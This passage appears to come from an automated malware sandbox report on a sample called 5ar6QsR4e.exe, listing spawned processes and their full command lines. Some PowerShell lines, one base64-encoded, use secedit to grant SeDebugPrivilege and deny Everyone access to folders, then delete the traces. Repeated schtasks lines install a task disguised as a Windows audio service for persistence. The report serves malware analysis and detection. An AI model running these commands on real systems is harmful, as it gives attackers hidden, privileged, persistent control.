Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:07:41
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 7824, Parent PID: 4196

General

Target ID:	47
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7836, Parent PID: 7816

General

Target ID:	48
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7852, Parent PID: 7824

General

Target ID:	50
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:07:42
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:07:47
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:07:47
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:07:47
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:07:47
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:07:48
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0xcf0000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:07:49
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7524, Parent PID: 7516

General

Target ID:	58
Start time:	10:07:49
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:07:49
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:07:53
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff7403e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5372, Parent PID: 7100

General

Target ID:	61
Start time:	10:07:53
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	10:07:55
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7764, Parent PID: 7748

General

Target ID:	63
Start time:	10:07:56
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	10:07:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	10:08:00
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5264, Parent PID: 7960

General

Target ID:	66
Start time:	10:08:00
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:08:02
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5900, Parent PID: 3160

General

Target ID:	68
Start time:	10:08:02
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	10:08:02
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:08:07
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3064, Parent PID: 5796

General

Target ID:	71
Start time:	10:08:07
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:08:08
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7104, Parent PID: 1584

General

Target ID:	73
Start time:	10:08:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	10:08:08
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:08:13
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:08:13
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	10:08:14
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6316, Parent PID: 4552

General

Target ID:	78
Start time:	10:08:14
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	10:08:14
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	10:08:19
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7400, Parent PID: 7488

General

Target ID:	81
Start time:	10:08:19
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	10:08:20
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7360, Parent PID: 7368

General

Target ID:	83
Start time:	10:08:20
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	10:08:21
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	10:08:25
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7436, Parent PID: 7520

General

Target ID:	86
Start time:	10:08:25
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	10:08:26
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6080, Parent PID: 7684

General

Target ID:	88
Start time:	10:08:26
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	10:08:27
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	10:08:31
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	10:08:31
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	10:08:33
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3656, Parent PID: 3052

General

Target ID:	93
Start time:	10:08:33
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	10:08:33
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0xe30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	10:08:37
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6872, Parent PID: 4816

General

Target ID:	96
Start time:	10:08:37
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	10:08:39
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
